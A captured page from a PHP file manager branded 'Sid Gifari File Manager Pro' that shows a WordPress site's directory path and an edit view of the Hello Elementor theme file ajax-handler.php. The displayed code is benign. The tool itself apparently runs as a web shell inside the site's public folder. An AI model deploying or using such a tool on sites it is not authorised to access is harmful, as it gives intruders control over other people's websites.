🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-14 21:36:48 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
public_html
/
wp-content
/
themes
/
hello-elementor
/
modules
/
admin-home
/
components
📍 /home/therahul/public_html/wp-content/themes/hello-elementor/modules/admin-home/components
🔄 Refresh
✏️
Editing: ajax-handler.php
Writable
<?php namespace HelloTheme\Modules\AdminHome\Components; if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } class Ajax_Handler { public function __construct() { add_action( 'wp_ajax_ehe_install_elementor', [ $this, 'install_elementor' ] ); } public function install_elementor() { wp_ajax_install_plugin(); } }
💾 Save Changes
❌ Cancel